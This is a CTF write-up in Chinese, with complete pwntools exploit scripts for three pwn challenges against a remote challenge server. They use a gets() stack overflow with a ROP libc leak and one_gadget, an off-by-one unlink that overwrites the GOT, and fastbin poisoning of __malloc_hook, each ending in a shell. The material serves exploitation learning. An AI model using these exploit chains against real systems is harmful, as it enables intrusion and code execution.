1024_happy_stack 发现程序使用了gets函数(没有长度限制,存在栈溢出),输入'36D'+'\x00'可以
绕过strcmp(strcmp 在 '\x00' 处停止比较,而 gets 会继续读入后面的数据),然后溢出覆盖返回地址,首先泄露libc,然后用同样的方法,利用one_gadget来getshell。一开始用system函数,发现一直出错,最后直接不管了,one_gadget一把梭。提交完群里师傅说可以多加一个ret进行栈对齐(rsp 需要 16 字节对齐,否则 system 内部的 movaps 指令会崩溃,这很可能就是之前 system 一直出错的原因),学到了,学到了。
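#! /usr/bin/env python
"""Exploit for 1024_happy_stack (./pwn1).

The binary reads input with gets(), so the line overflows into the saved
return address.  A leading '36D\x00' satisfies the strcmp() on the input
while gets() keeps copying past the NUL.  Two stages:

1. ROP to puts(puts@got) and return into main() to leak a libc address.
2. Overflow again and return straight into a one_gadget.

The puts symbol and the one_gadget offset come from
libc6_2.27-3ubuntu1_amd64.so; both are wrong for any other libc build.
"""
from pwn import *
from LibcSearcher import *  # unused by this script, kept from the original

# sh = process('./pwn1')
sh = remote('111.231.70.44', 28018)
elf = ELF('./pwn1')
libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
context.log_level = 'debug'

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4005A0            # re-enter main() so the buffer can be overflowed again
pop_rdi_ret = 0x400803          # `pop rdi ; ret` gadget in ./pwn1 (non-PIE addresses)

PREFIX = b'36D\x00'             # passes the strcmp; gets() keeps reading past the NUL
PAD = 0x384                     # bytes from the end of PREFIX to the saved return address
ONE_GADGET_OFF = 0x4f2c5        # from `one_gadget libc6_2.27-3ubuntu1_amd64.so`


def overflow(tail, filler=b'a'):
    """Send one gets() line: PREFIX, `filler` repeated up to the return address, then `tail`."""
    sh.sendline(PREFIX + filler * PAD + tail)


def leak_libc_base():
    """Leak puts@libc through a puts(puts@got) ROP chain and return the libc base."""
    overflow(p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr))
    sh.recvuntil(b'36D\n')      # the '36D' line the program prints before the leaked pointer
    # puts() emits the 6 non-zero bytes of the pointer.  recvn() blocks until
    # all 6 have arrived; plain recv(6) may return short and silently mis-parse.
    puts_addr = u64(sh.recvn(6).ljust(8, b'\x00'))
    sh.success('puts_addr : ' + hex(puts_addr))
    base = puts_addr - libc.symbols['puts']
    # A libc mapping is page aligned; anything else means the leak was
    # mis-parsed or the local libc does not match the remote one.
    if base & 0xfff:
        raise ValueError('implausible libc base %#x (leak/libc mismatch?)' % base)
    sh.success('libc_base : ' + hex(base))
    return base


libc_base = leak_libc_base()
one_gadget = libc_base + ONE_GADGET_OFF
# Zero filler in the second stage -- presumably to keep the stack slots the
# one_gadget constraint inspects NULL; check the constraint `one_gadget` prints.
# If the gadget still fails, the write-up notes that a bare `ret` gadget in
# front of one_gadget realigns rsp to 16 bytes.
sleep(0.5)                      # let main() restart before the second line arrives
overflow(p64(one_gadget), filler=b'\x00')
sh.interactive()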
1024_happy_checkin 和第一题一样的栈溢出:先用puts泄露libc并返回main,再溢出一次跳到one_gadget,一把梭。
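#! /usr/bin/env python
"""Exploit for 1024_happy_checkin (./pwn2).

Plain stack overflow, same two-stage plan as 1024_happy_stack: leak
puts@libc with a puts(puts@got) ROP chain that returns into main(), then
overflow again and return into a one_gadget.  Offsets assume
libc6_2.27-3ubuntu1_amd64.so.
"""
from pwn import *
from LibcSearcher import *  # unused by this script, kept from the original

# sh = process('./pwn2')
sh = remote('111.231.70.44', 28028)
elf = ELF('./pwn2')
libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
context.log_level = 'debug'

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4005F7            # re-enter main() for the second overflow
pop_rdi_ret = 0x4006e3          # `pop rdi ; ret` gadget in ./pwn2

PAD = 0x370                     # buffer start -> saved rbp
ONE_GADGET_OFF = 0x4f2c5        # from `one_gadget libc6_2.27-3ubuntu1_amd64.so`

# Stage 1: a 'bbbbbbbb' marker over the saved rbp, then puts(puts@got), then main().
payload = b'a' * PAD + b'b' * 8
payload += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
sh.sendline(payload)
# The marker comes back in the program's output, followed (after whatever
# else it echoes) by the leaked pointer; take the 6 bytes ending at its 0x7f
# high byte.
sh.recvuntil(b'b' * 8)
puts_addr = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
sh.success('puts_addr : ' + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
# A libc mapping is page aligned; anything else means the leak was mis-parsed
# or the local libc does not match the remote one.
if libc_base & 0xfff:
    raise ValueError('implausible libc base %#x (leak/libc mismatch?)' % libc_base)
sh.success('libc_base : ' + hex(libc_base))
one_gadget = libc_base + ONE_GADGET_OFF

# Stage 2: overflow again and return into the one_gadget.
payload = b'a' * PAD + b'a' * 8
payload += p64(one_gadget)
sleep(0.5)                      # let main() restart before the second line arrives
sh.sendline(payload)
sh.interactive()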
1024_happy_unlink 程序存在off by one 漏洞,伪造fake_chunk,触发unlink,然后修改chunk_ptr为got地址,通过show函数泄露libc,修改free_got为system_addr,再次free就会getshell。需要注意的是,在做题的时候,我用题目给的libc,远程一直打不通,最后根据泄露的got地址,在网上查了对应的libc版本才得以打通,题目提供的libc可能与远程环境不一致(exp里的offset是按查到的libc写死的,换环境需要重新计算)。
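#! /usr/bin/env python
"""Exploit for 1024_happy_unlink (./pwn3): off-by-one -> unlink -> GOT overwrite.

A one-byte heap overflow from chunk 1 into chunk 2's size field clears
PREV_INUSE and (together with a planted prev_size) makes free(2)
consolidate backwards into a fake chunk built inside chunk 1.  The unlink
write turns the program's pointer slot for chunk 1 into a pointer just below
the pointer array, so editing index 1 rewrites the array with GOT addresses:
show(0) becomes an arbitrary read and edit(0) an arbitrary write.  free@got
is patched to system and free() of a "/bin/sh" chunk spawns the shell.
"""
from pwn import *

# sh = process('./pwn3')
sh = remote('111.231.70.44', 28048)
elf = ELF('./pwn3')
context.log_level = 'debug'
# libc = ELF('./libc.so.6')


def add(index, size):
    """Menu 1: allocate chunk `index` with the requested `size`."""
    sh.recvuntil(b': ')
    sh.sendline(b'1')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())
    sh.recvuntil(b': ')
    sh.sendline(str(size).encode())


def free(index):
    """Menu 2: free chunk `index`."""
    sh.recvuntil(b': ')
    sh.sendline(b'2')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())


def show(index):
    """Menu 3: print the contents of chunk `index` (the leak primitive)."""
    sh.recvuntil(b': ')
    sh.sendline(b'3')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())


def edit(index, content):
    """Menu 4: write `content` into chunk `index` (raw send, no newline)."""
    sh.recvuntil(b': ')
    sh.sendline(b'4')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())
    sh.recvuntil(b': ')
    sh.send(content)


# .bss slot holding the pointer to chunk 1.  unlink's FD->bk == P and
# BK->fd == P checks are satisfied by pointing fd/bk 0x18/0x10 below it.
chunk_ptr = 0x6020f0
fd = chunk_ptr - 0x18
bk = chunk_ptr - 0x10
free_got = elf.got['free']
puts_got = elf.got['puts']

# libc offsets of free and system.  The libc shipped with the task did not
# match the remote; these were looked up from the leaked free@got value (see
# write-up).  The other exploit for this binary loads
# libc6_2.23-0ubuntu10_amd64.so, presumably the same build -- confirm with
# ELF(...).symbols before reusing them anywhere else.
FREE_OFF = 0x0844f0
SYSTEM_OFF = 0x045390

add(0, 0x60)
add(1, 0x88)                    # 0x90 chunk; byte 0x88 overflows into chunk 2's size
add(2, 0x80)                    # 0x90 chunk, victim of the backward consolidation
# NOTE(review): a string is sent where a size is expected; the remote
# presumably parses it as 0 (minimum 0x20 chunk) -- confirm, or pass a real size.
add(3, '/bin/sh\x00')

# Fake chunk at chunk 1's user pointer: prev_size 0, size 0x81 (0x80|PREV_INUSE),
# fd/bk as above, 0x60 bytes of body so the fake chunk spans 0x80.  Then chunk
# 2's prev_size = 0x80 and, through the off-by-one, the low byte of chunk 2's
# size 0x91 -> 0x90, clearing PREV_INUSE.
fake = p64(0) + p64(0x81) + p64(fd) + p64(bk) + b'a' * 0x60
edit(1, fake + p64(0x80) + b'\x90')
free(2)                         # backward consolidation; unlink() sets *chunk_ptr = fd
# chunk_ptr now points 0x18 below itself, so editing index 1 rewrites the
# pointer array: slot 0 <- free@got, the following qword <- puts@got
# (presumably slot 1 or slot 0's size field -- check the layout in gdb).
edit(1, b'a' * 8 + p64(free_got) + p64(puts_got))
show(0)                         # prints *free@got, i.e. free's libc address
# recvn() waits for exactly 6 bytes; recv(6) may return short and mis-parse.
free_addr = u64(sh.recvn(6).ljust(8, b'\x00'))
sh.success('free_addr : ' + hex(free_addr))
libc_base = free_addr - FREE_OFF
# A libc mapping is page aligned; anything else means the offsets above do
# not belong to the remote libc.
if libc_base & 0xfff:
    raise ValueError('implausible libc base %#x (wrong libc offsets?)' % libc_base)
sh.success('libc_base : ' + hex(libc_base))
system_addr = libc_base + SYSTEM_OFF
sh.success('system_addr : ' + hex(system_addr))
edit(0, p64(system_addr))       # slot 0 is free@got: free() now calls system()
edit(3, b'/bin/sh\x00')
free(3)                         # free("/bin/sh") -> system("/bin/sh")
# gdb.attach(sh)
sh.interactive()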
这里我还用了另一种方法,非预期???
通过off by one 漏洞修改 chunk_size,造成堆块重叠,然后泄露libc(unsorted bin 的 fd 指向 main_arena+88),之后通过fastbin attack将chunk申请到__malloc_hook附近,写入one_gadget来getshell。
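#! /usr/bin/env python
"""Second exploit for 1024_happy_unlink (./pwn3), possibly unintended.

Instead of unlink, the off-by-one enlarges chunk 1's size so that freeing it
puts an oversized chunk in the unsorted bin.  Carving a 0x70 chunk from it
leaves the remainder's header (fd/bk = main_arena+88) inside chunk 2, which
show(2) leaks.  The remainder overlaps chunk 2, so after re-allocating and
freeing it as a fastbin chunk its fd can be rewritten through chunk 2
(fastbin poisoning) to land an allocation on top of __malloc_hook and point
it at a one_gadget.  All offsets are for libc6_2.23-0ubuntu10_amd64.so.
"""
from pwn import *

# sh = process('./pwn3')
sh = remote('111.231.70.44', 28016)
elf = ELF('./pwn3')
context.log_level = 'debug'
libc = ELF('./libc6_2.23-0ubuntu10_amd64.so')


def add(index, size):
    """Menu 1: allocate chunk `index` with the requested `size`."""
    sh.recvuntil(b': ')
    sh.sendline(b'1')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())
    sh.recvuntil(b': ')
    sh.sendline(str(size).encode())


def free(index):
    """Menu 2: free chunk `index`."""
    sh.recvuntil(b': ')
    sh.sendline(b'2')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())


def show(index):
    """Menu 3: print the contents of chunk `index` (the leak primitive)."""
    sh.recvuntil(b': ')
    sh.sendline(b'3')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())


def edit(index, content):
    """Menu 4: write `content` into chunk `index` (raw send, no newline)."""
    sh.recvuntil(b': ')
    sh.sendline(b'4')
    sh.recvuntil(b'idx: ')
    sh.sendline(str(index).encode())
    sh.recvuntil(b': ')
    sh.send(content)


MAIN_ARENA_OFF = 0x3c4b20       # main_arena offset in libc6_2.23-0ubuntu10_amd64
ONE_GADGET_OFF = 0xf1147        # from `one_gadget`; regenerate for any other libc

add(0, 0x18)                    # 0x20 chunk; byte 0x18 overflows into chunk 1's size
add(1, 0x60)                    # 0x70 chunk
add(2, 0x60)                    # 0x70 chunk, will be overlapped by the remainder
add(3, 0x10)                    # presumably keeps the overlapped region off the top chunk

# Off-by-one: chunk 1's size 0x71 -> 0xe1, i.e. chunks 1 and 2 as one 0xe0 chunk.
edit(0, b'a' * 0x18 + b'\xe1')
free(1)                         # 0xe0 is beyond fastbin range -> unsorted bin
add(4, 0x60)                    # split: the 0x70 remainder now starts at chunk 2's header
show(2)                         # chunk 2's data holds the remainder's fd = main_arena+88
# recvn() waits for exactly 6 bytes; recv(6) may return short and mis-parse.
main_arena = u64(sh.recvn(6).ljust(8, b'\x00')) - 88
sh.success('main_arena : ' + hex(main_arena))
libc_base = main_arena - MAIN_ARENA_OFF
# A libc mapping is page aligned; anything else means the leak was mis-parsed
# or MAIN_ARENA_OFF belongs to a different libc build.
if libc_base & 0xfff:
    raise ValueError('implausible libc base %#x (leak/libc mismatch?)' % libc_base)
sh.success('libc_base : ' + hex(libc_base))
malloc_hook = libc_base + libc.symbols['__malloc_hook']
sh.success('malloc_hook : ' + hex(malloc_hook))
one_gadget = libc_base + ONE_GADGET_OFF

# Fastbin poisoning: take the remainder (overlapping chunk 2), free it into
# the 0x70 fastbin, then rewrite its fd through chunk 2.  malloc_hook-0x23 is
# the usual spot where a 0x7f byte serves as a fake 0x70 size -- verify in gdb.
add(5, 0x60)
free(5)
edit(2, p64(malloc_hook - 0x23))
add(6, 0x60)                    # hands chunk 5 back
add(7, 0x60)                    # hands out the fake chunk; its data starts at malloc_hook-0x13
edit(7, b'a' * 3 + p64(0) * 2 + p64(one_gadget))    # 3 + 16 filler bytes reach __malloc_hook
add(1, 0x20)                    # any malloc() now jumps into the one_gadget
# gdb.attach(sh)
sh.interactive()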